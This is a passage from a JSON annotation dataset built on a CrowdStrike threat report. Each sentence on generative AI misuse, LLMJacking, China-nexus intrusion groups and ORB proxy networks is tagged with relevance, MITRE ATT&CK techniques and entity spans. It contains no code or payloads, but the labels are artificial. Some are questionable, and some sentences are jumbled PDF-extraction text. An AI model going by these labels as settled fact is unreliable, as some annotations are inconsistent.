"Drive-by Compromise" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Users clicking advertisements are directed to malicious download sites, while direct traffic is redirected to LLM-generated decoy websites.", "entities": [ { "text": "Clicking on the advertisement", "start": 0, "end": 29, "label": "Action" }, { "text": "malicious download site", "start": 42, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "LLM-generated decoy site", "start": 109, "end": 133, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s202-8d3bd6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 202, "context_before": "Clicking on the advertisement exposes the malicious download site, while direct accesses are forwarded to an LLM-generated decoy site.", "sentence_text": "Throughout 2024, several malicious actors discussed using genAI in criminal marketplaces and forums.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s203-e343ad", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 203, "context_before": "Throughout 2024, several malicious actors discussed using genAI in criminal marketplaces and forums.", "sentence_text": "For example, one Latin America (LATAM)-based threat actor discussed using generative pre-trained transformers (GPTs) and genAI to learn how to build malware with C and C++.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s204-a8e1ea", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 204, "context_before": "For example, one Latin America (LATAM)-based threat actor discussed using generative pre-trained transformers (GPTs) and genAI to learn how to build malware with C and C++.", "sentence_text": "Vulnerability Research and Exploitation GenAI models are both a target and enabler of exploit-related activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s205-4d9e8e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 205, "context_before": "Vulnerability Research and Exploitation GenAI models are both a target and enabler of exploit-related activity.", "sentence_text": "As with CNO, LLMs can accelerate vulnerability research and testing by potentially speeding up development timelines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s206-22ed15", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 206, "context_before": "As with CNO, LLMs can accelerate vulnerability research and testing by potentially speeding up development timelines.", "sentence_text": "However, confirmed evidence of LLM-aided vulnerability exploit development, and exploitation of LLMs in the wild, remains rare.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s207-1d3f3c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 207, "context_before": "However, confirmed evidence of LLM-aided vulnerability exploit development, and exploitation of LLMs in the wild, remains rare.", "sentence_text": "In 2024, Iran-nexus actors were among the most notable groups seeking genAI support in the vulnerability landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s208-39aecf", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 208, "context_before": "In 2024, Iran-nexus actors were among the most notable groups seeking genAI support in the vulnerability landscape.", "sentence_text": "Iranian government initiatives aspire to leverage AI to develop assistants and enable patching systems for domestic networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s209-f1f935", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 209, "context_before": "Iranian government initiatives aspire to leverage AI to develop assistants and enable patching systems for domestic networks.", "sentence_text": "Moreover, Iran’s government aims to use LLMs in vulnerability research and exploit development.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s210-e60d40", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 210, "context_before": "Moreover, Iran’s government aims to use LLMs in vulnerability research and exploit development.", "sentence_text": "Threat actors’ interest in genAI-enabled exploit development is further evidenced by observed activity in April 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s211-4f3df0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 211, "context_before": "Threat actors’ interest in genAI-enabled exploit development is further evidenced by observed activity in April 2024.", "sentence_text": "An unattributed threat actor likely used genAI to develop an alleged exploit for a command injection vulnerability in GlobalProtect PAN-OS Gateway (CVE-2024-3400).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "An unattributed threat actor uses genAI to develop an exploit for a command injection vulnerability in GlobalProtect PAN-OS Gateway (CVE-2024-3400).", "entities": [ { "text": "An unattributed threat actor", "start": 0, "end": 28, "label": "ThreatActor" }, { "text": "used genAI to develop an alleged exploit", "start": 36, "end": 76, "label": "Action" }, { "text": "command injection vulnerability", "start": 83, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s212-89d9f3", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 212, "context_before": "An unattributed threat actor likely used genAI to develop an alleged exploit for a command injection vulnerability in GlobalProtect PAN-OS Gateway (CVE-2024-3400).", "sentence_text": "While the exploit was ultimately ineffective, CrowdStrike Intelligence observed exploitation attempts as threat actors attempted to rapidly repurpose LLM-generated exploits in the wild.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Threat actors attempt to exploit vulnerabilities by repurposing LLM-generated exploits in observed real-world attempts.", "entities": [ { "text": "threat actors", "start": 105, "end": 118, "label": "ThreatActor" }, { "text": "attempted to rapidly repurpose LLM-generated exploits", "start": 119, "end": 172, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s213-50640c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 213, "context_before": "While the exploit was ultimately ineffective, CrowdStrike Intelligence observed exploitation attempts as threat actors attempted to rapidly repurpose LLM-generated exploits in the wild.", "sentence_text": "Alternatively, threat actors and researchers are exploring potential attack vectors associated with vulnerabilities within genAI models.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s214-911ce8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 214, "context_before": "Alternatively, threat actors and researchers are exploring potential attack vectors associated with vulnerabilities within genAI models.", "sentence_text": "Cloud-Conscious Threat Actors Cloud-conscious adversaries are beginning to explore genAI and LLMs for their operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s215-0bf8c6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 215, "context_before": "Cloud-Conscious Threat Actors Cloud-conscious adversaries are beginning to explore genAI and LLMs for their operations.", "sentence_text": "As cloud adoption expands and genAI becomes more integrated into services such as Azure AI Foundry (formerly Azure AI Studio),3 threat actors will likely begin exploiting genAI services for data theft, model manipulation, unauthorized access, and other malicious purposes.\nvulnerabilities and misconfigurations in the growing genAI-driven cloud ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s216-a1283a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 216, "context_before": "As cloud adoption expands and genAI becomes more integrated into services such as Azure AI Foundry (formerly Azure AI Studio),3 threat actors will likely begin exploiting genAI services for data theft, model manipulation, unauthorized access, and other malicious purposes.\nvulnerabilities and misconfigurations in the growing genAI-driven cloud ecosystem.", "sentence_text": "CASE HIGHLIGHT: LLMJACKING LLMJacking involves threat actors exploiting stolen cloud credentials to access AI services to fuel an expanding criminal market for unauthorized LLM queries.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1586", "name": "Compromise Accounts" } ], "procedure": "LLMJacking involves threat actors using stolen cloud credentials to access AI services and enable unauthorized LLM queries.", "entities": [ { "text": "threat actors", "start": 47, "end": 60, "label": "ThreatActor" }, { "text": "exploiting stolen cloud credentials", "start": 61, "end": 96, "label": "Action" }, { "text": "access AI services", "start": 100, "end": 118, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s217-d64eec", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 217, "context_before": "CASE HIGHLIGHT: LLMJACKING LLMJacking involves threat actors exploiting stolen cloud credentials to access AI services to fuel an expanding criminal market for unauthorized LLM queries.", "sentence_text": "In Q2 2024, an unknown threat actor compromised a North American consulting victim.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "An unknown threat actor compromised a North American consulting victim in Q2 2024.", "entities": [ { "text": "compromised a North American consulting victim", "start": 36, "end": 82, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s218-6b2707", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 218, "context_before": "In Q2 2024, an unknown threat actor compromised a North American consulting victim.", "sentence_text": "In this operation, the threat actor prepared for LLMJacking by listing available foundational machine learning (ML) models for a cloud-based AI service.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1580", "name": "Cloud Infrastructure Discovery" } ], "procedure": "The threat actor prepares for LLMJacking by enumerating available ML models in a cloud-based AI service.", "entities": [ { "text": "the threat actor", "start": 19, "end": 35, "label": "ThreatActor" }, { "text": "prepared for LLMJacking", "start": 36, "end": 59, "label": "Action" }, { "text": "listing available foundational machine learning (ML) models", "start": 63, "end": 122, "label": "Action" }, { "text": "cloud-based AI service", "start": 129, "end": 151, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s219-234d91", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 219, "context_before": "In this operation, the threat actor prepared for LLMJacking by listing available foundational machine learning (ML) models for a cloud-based AI service.", "sentence_text": "For unavailable models, the threat actor attempted to gain access by leveraging an API that enables users to request permission for restricted machine learning models by submitting a justification.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "The threat actor attempts to gain access to restricted machine learning models via an API permission request workflow.", "entities": [ { "text": "threat actor", "start": 28, "end": 40, "label": "ThreatActor" }, { "text": "attempted to gain access by leveraging an API", "start": 41, "end": 86, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s220-68b40f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 220, "context_before": "For unavailable models, the threat actor attempted to gain access by leveraging an API that enables users to request permission for restricted machine learning models by submitting a justification.", "sentence_text": "In a separate Q4 2024 campaign, a threat actor compromised a North America-based technology company and similarly attempted to use the same API to obtain access to models hosted on the cloud platform.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "A threat actor compromises a North America-based technology company and attempts to use an API to obtain access to cloud-hosted machine learning models.", "entities": [ { "text": "threat actor", "start": 34, "end": 46, "label": "ThreatActor" }, { "text": "compromised a North America-based technology company", "start": 47, "end": 99, "label": "Action" }, { "text": "API", "start": 140, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "obtain access to models hosted on the cloud platform", "start": 147, "end": 199, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s221-9c0250", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 221, "context_before": "In a separate Q4 2024 campaign, a threat actor compromised a North America-based technology company and similarly attempted to use the same API to obtain access to models hosted on the cloud platform.", "sentence_text": "In both cases, the threat actors likely intended to resell ML model access to other threat actors seeking to use the models for malicious purposes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p24-s222-16c92f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 24, "sentence_id": 222, "context_before": "In both cases, the threat actors likely intended to resell ML model access to other threat actors seeking to use the models for malicious purposes.", "sentence_text": "3 https://azure.microsoft.com/en-us/blog/build-your-own-copilot-with-microsoft-azure-ai-studio/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p25-s223-15b12c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 25, "sentence_id": 223, "context_before": "3 https://azure.microsoft.com/en-us/blog/build-your-own-copilot-with-microsoft-azure-ai-studio/", "sentence_text": "GenAI Outlook\nMore adversaries will likely use genAI to augment social engineering and CNO campaigns in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p25-s224-875642", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 25, "sentence_id": 224, "context_before": "GenAI Outlook\nMore adversaries will likely use genAI to augment social engineering and CNO campaigns in 2025.", "sentence_text": "This assessment is made with moderate confidence based on the growing availability and capability of genAI tools and adversaries’ increased experience with integrating them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p25-s225-dc4922", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 25, "sentence_id": 225, "context_before": "This assessment is made with moderate confidence based on the growing availability and capability of genAI tools and adversaries’ increased experience with integrating them.", "sentence_text": "CHINA’S\nCYBER ENTERPRISE\nChina’s Maturing Cyber Capabilities China’s cyber espionage and intelligence collection capabilities reached an inflection point in 2024 relative to previous years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p25-s226-450562", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 25, "sentence_id": 226, "context_before": "CHINA’S\nCYBER ENTERPRISE\nChina’s Maturing Cyber Capabilities China’s cyber espionage and intelligence collection capabilities reached an inflection point in 2024 relative to previous years.", "sentence_text": "In addition to prolific and high-profile cyber espionage activities — which continued to increase across almost every sector that CrowdStrike Intelligence tracks — China-nexus adversaries and the larger ecosystem supporting their operations have matured in capability and capacity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p25-s227-757205", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 25, "sentence_id": 227, "context_before": "In addition to prolific and high-profile cyber espionage activities — which continued to increase across almost every sector that CrowdStrike Intelligence tracks — China-nexus adversaries and the larger ecosystem supporting their operations have matured in capability and capacity.", "sentence_text": "The underlying motivation is likely China’s desire for regional influence in the nation’s near abroad.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p25-s228-866ffc", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 25, "sentence_id": 228, "context_before": "The underlying motivation is likely China’s desire for regional influence in the nation’s near abroad.", "sentence_text": "This includes a desire for the eventual reunification of Taiwan, which may ultimately bring China into conflict with the United States.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p25-s229-0a49d9", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 25, "sentence_id": 229, "context_before": "This includes a desire for the eventual reunification of Taiwan, which may ultimately bring China into conflict with the United States.", "sentence_text": "In addition to facilitating intelligence collection against foreign political and military entities, these operations likely fulfill general intelligence requirements in the Chinese Communist Party (CCP)’s strategic plans.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p25-s230-b8d361", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 25, "sentence_id": 230, "context_before": "In addition to facilitating intelligence collection against foreign political and military entities, these operations likely fulfill general intelligence requirements in the Chinese Communist Party (CCP)’s strategic plans.", "sentence_text": "This includes the 14th Five-Year Plan, which highlights key sector and technology priorities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p25-s231-44dfa9", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 25, "sentence_id": 231, "context_before": "This includes the 14th Five-Year Plan, which highlights key sector and technology priorities.", "sentence_text": "China-nexus adversaries also conduct intelligence collection against social and political movements perceived as domestic security threats in China.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p26-s234-ed81cd", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 26, "sentence_id": 234, "context_before": "National Rejuvenation (伟大复兴)", "sentence_text": "General Secretary Xi Jinping’s 2014 call for China to become a cyber power and the CCP’s grand strategy of (网络强国)\nnational rejuvenation have accelerated the sophistication of China’s cyber capabilities throughout the first (伟大复兴)\nquarter of the 21st century.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p26-s235-79cb32", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 26, "sentence_id": 235, "context_before": "General Secretary Xi Jinping’s 2014 call for China to become a cyber power and the CCP’s grand strategy of (网络强国)\nnational rejuvenation have accelerated the sophistication of China’s cyber capabilities throughout the first (伟大复兴)\nquarter of the 21st century.", "sentence_text": "The CCP’s decades of cyber program investments include:\n• Expanding CCP oversight of information networks in China through a broad cybersecurity legal framework • CCP investment in university systems that produce a highly trained and readily available cyber workforce •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p26-s236-fd8555", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 26, "sentence_id": 236, "context_before": "The CCP’s decades of cyber program investments include:\n• Expanding CCP oversight of information networks in China through a broad cybersecurity legal framework • CCP investment in university systems that produce a highly trained and readily available cyber workforce •", "sentence_text": "Private sector contracting pipelines that provide skilled support and infrastructure to the People’s Liberation Army (PLA), Ministry of Public Security (MPS), and Ministry of State Security (MSS) cyber units • Vulnerability discovery, bug hunt, and domestic capture-the-flag competitions that foster Chinese cyber talent and feed CCP-controlled exploit development programs •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p26-s237-38dc46", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 26, "sentence_id": 237, "context_before": "Private sector contracting pipelines that provide skilled support and infrastructure to the People’s Liberation Army (PLA), Ministry of Public Security (MPS), and Ministry of State Security (MSS) cyber units • Vulnerability discovery, bug hunt, and domestic capture-the-flag competitions that foster Chinese cyber talent and feed CCP-controlled exploit development programs •", "sentence_text": "Industry networking through which MSS and PLA cyber operators increasingly share unique closed-access tooling and tradecraft UNIVERSITIES WORKFORCE INFRASTRUCTURE (ORBS), CONTRACTORS HIGH-CAPABILITY OPERATORS CHINA'S MATURING CYBER ECOSYSTEM VULNERABILITIES, TALENT AND CAPTURE-THE-FLAG CLOSED-EXPLOIT EVENTS, BUG HUNTS PROGRAMS TOOL AND INDUSTRY TRAINING NETWORKING PROPAGATION Highly likely as a result of these investments, China-nexus targeted intrusion operations are marked by increased OPSEC and specialization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p26-s238-756621", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 26, "sentence_id": 238, "context_before": "Industry networking through which MSS and PLA cyber operators increasingly share unique closed-access tooling and tradecraft UNIVERSITIES WORKFORCE INFRASTRUCTURE (ORBS), CONTRACTORS HIGH-CAPABILITY OPERATORS CHINA'S MATURING CYBER ECOSYSTEM VULNERABILITIES, TALENT AND CAPTURE-THE-FLAG CLOSED-EXPLOIT EVENTS, BUG HUNTS PROGRAMS TOOL AND INDUSTRY TRAINING NETWORKING PROPAGATION Highly likely as a result of these investments, China-nexus targeted intrusion operations are marked by increased OPSEC and specialization.", "sentence_text": "Adversaries are pre-positioning themselves into critical networks and are supported by industry networking and larger ecosystems, which include shared tooling and training pipelines supplying them with sophisticated malware and tradecraft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p27-s239-1051d9", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 27, "sentence_id": 239, "context_before": "Adversaries are pre-positioning themselves into critical networks and are supported by industry networking and larger ecosystems, which include shared tooling and training pipelines supplying them with sophisticated malware and tradecraft.", "sentence_text": "China-Nexus Adversaries Dominate the Global Threat Landscape China-nexus intrusions increased 150% across all sectors on average compared to 2023 and represent the most active targeted intrusion threats CrowdStrike Intelligence tracks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p27-s240-0cea43", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 27, "sentence_id": 240, "context_before": "China-Nexus Adversaries Dominate the Global Threat Landscape China-nexus intrusions increased 150% across all sectors on average compared to 2023 and represent the most active targeted intrusion threats CrowdStrike Intelligence tracks.", "sentence_text": "NORTH AMERICA WESTERN EUROPE EAST ASIA NORTHERN EUROPE EASTERN EUROPE SOUTHERN EUROPE SOUTHEAST ASIA MENA OCEANIA AFRICA CHINA-NEXUS SOUTH ASIA SOUTH AMERICATARGETING IN 2024 ACADEMIC ENERGY GOVERNMENT MARITIME PROFESSIONAL SERVICES AEROSPACE ENGINEERING HEALTHCARE MEDIA TECHNOLOGY CHEMICALS ENTERTAINMENT LEGAL MILITARY TELECOMMUNICATIONS DEFENSE FINANCIAL SERVICES LOGISTICS NGO SECTORS DISSIDENT GAMING MANUFACTURING POLITICAL PARTIES", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p28-s241-b8e094", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 28, "sentence_id": 241, "context_before": "NORTH AMERICA WESTERN EUROPE EAST ASIA NORTHERN EUROPE EASTERN EUROPE SOUTHERN EUROPE SOUTHEAST ASIA MENA OCEANIA AFRICA CHINA-NEXUS SOUTH ASIA SOUTH AMERICATARGETING IN 2024 ACADEMIC ENERGY GOVERNMENT MARITIME PROFESSIONAL SERVICES AEROSPACE ENGINEERING HEALTHCARE MEDIA TECHNOLOGY CHEMICALS ENTERTAINMENT LEGAL MILITARY TELECOMMUNICATIONS DEFENSE FINANCIAL SERVICES LOGISTICS NGO SECTORS DISSIDENT GAMING MANUFACTURING POLITICAL PARTIES", "sentence_text": "Specialized China-Nexus Adversaries originating from China in 2024, five of which are unique in their specialization and sophistication.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p28-s242-39ad71", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 28, "sentence_id": 242, "context_before": "Specialized China-Nexus Adversaries originating from China in 2024, five of which are unique in their specialization and sophistication.", "sentence_text": "LIMINAL PANDA Demonstrates extensive knowledge of telecommunications networks and uses compromised telecom infrastructure to move across regions LOCKSMITH PANDA Has targeted technology, gaming, energy, and telecommunications entities in Taiwan and Indonesia as well as Hong Kong democracy activists in operations likely intended to facilitate intelligence collection OPERATOR PANDA Has targeted telecom and professional services entities and relies heavily on exploiting internet-facing appliances (such as Cisco switches) for initial access VAULT PANDA Exploits web-facing applications to achieve initial access to victim networks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Adversaries exploit internet-facing appliances and web-facing applications to achieve initial access to victim networks.", "entities": [ { "text": "LIMINAL PANDA", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "LOCKSMITH PANDA", "start": 145, "end": 160, "label": "ThreatActor" }, { "text": "OPERATOR PANDA", "start": 367, "end": 381, "label": "ThreatActor" }, { "text": "VAULT PANDA", "start": 542, "end": 553, "label": "ThreatActor" }, { "text": "uses compromised telecom infrastructure", "start": 82, "end": 121, "label": "Action" }, { "text": "exploiting internet-facing appliances", "start": 460, "end": 497, "label": "Action" }, { "text": "Exploits web-facing applications", "start": 554, "end": 586, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p28-s243-e5fb9c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 28, "sentence_id": 243, "context_before": "LIMINAL PANDA\nDemonstrates extensive knowledge of telecommunications networks and uses compromised telecom infrastructure to move across regions LOCKSMITH PANDA Has targeted technology, gaming, energy, and telecommunications entities in Taiwan and Indonesia as well as Hong Kong democracy activists in operations likely intended to facilitate intelligence collection OPERATOR PANDA Has targeted telecom and professional services entities and relies heavily on exploiting internet-facing appliances (such as Cisco switches) for initial access VAULT PANDA Exploits web-facing applications to achieve initial access »THE FINANCIAL SERVICES, MEDIA, to victim networks and uses a combination of unique, shared, MANUFACTURING, AND INDUSTRIALS and publicly available tools in their intrusions; targets financial AND ENGINEERING SECTORS ALL services, gambling, technology, academic, defense, and EXPERIENCED 200-300% INCREASES government entities likely to facilitate intelligence IN OBSERVED CHINA-NEXUS INTRUSIONS collection operations COMPARED TO PREVIOUS YEARS.", "sentence_text": "ENVOY PANDA\nTargets Africa- and Middle East-based government entities — particularly in the diplomatic space — and increasingly uses anonymization attempts in the operations", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p29-s244-74d7ce", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 29, "sentence_id": 244, "context_before": "ENVOY PANDA\nTargets Africa- and Middle East-based government entities — particularly in the diplomatic space — and increasingly uses anonymization attempts in the operations", "sentence_text": "Multiple adversaries employed ORB networks consisting of hundreds or thousands of compromised devices to proxy and route their traffic during intrusion operations in an attempt to maintain anonymity.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "Adversaries used ORB networks composed of compromised devices to proxy and route traffic during intrusion operations to maintain anonymity.", "entities": [ { "text": "Multiple adversaries", "start": 0, "end": 20, "label": "ThreatActor" }, { "text": "employed ORB networks consisting of hundreds or thousands of compromised devices", "start": 21, "end": 101, "label": "Action" }, { "text": "proxy and route their traffic", "start": 105, "end": 134, "label": "Action" }, { "text": "ORB networks", "start": 30, "end": 42, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p29-s245-7cd8e8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 29, "sentence_id": 245, "context_before": "Multiple adversaries employed ORB networks consisting of hundreds or thousands of compromised devices to proxy and route their traffic during intrusion operations in an attempt to maintain anonymity.", "sentence_text": "Despite law enforcement attempts to disrupt the ORB networks, China-nexus adversaries continue to use these resources as a key part of their operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p29-s246-ad9aa4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 29, "sentence_id": 246, "context_before": "Despite law enforcement attempts to disrupt the ORB networks, China-nexus adversaries continue to use these resources as a key part of their operations.", "sentence_text": "They also continue to share tools; for example, at least five distinct China-nexus adversaries are now using the once-unique malware KEYPLUG.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p29-s247-79c960", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 29, "sentence_id": 247, "context_before": "They also continue to share tools; for example, at least five distinct China-nexus adversaries are now using the once-unique malware KEYPLUG.", "sentence_text": "CLOUD-CONSCIOUS\nTHREAT ACTORS CONTINUE TO INNOVATE In 2024, new and unattributed cloud intrusions increased 26% compared to 2023, indicating more threat actors seek to exploit cloud services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p29-s248-bdfa39", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 29, "sentence_id": 248, "context_before": "CLOUD-CONSCIOUS\nTHREAT ACTORS CONTINUE TO INNOVATE In 2024, new and unattributed cloud intrusions increased 26% compared to 2023, indicating more threat actors seek to exploit cloud services.", "sentence_text": "Other cloud-conscious tactics — such as enumerating cloud infrastructure and identities and maintaining persistence via alternate authentication mechanisms — were consistent throughout 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p29-s249-817f11", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 29, "sentence_id": 249, "context_before": "Other cloud-conscious tactics — such as enumerating cloud infrastructure and identities and maintaining persistence via alternate authentication mechanisms — 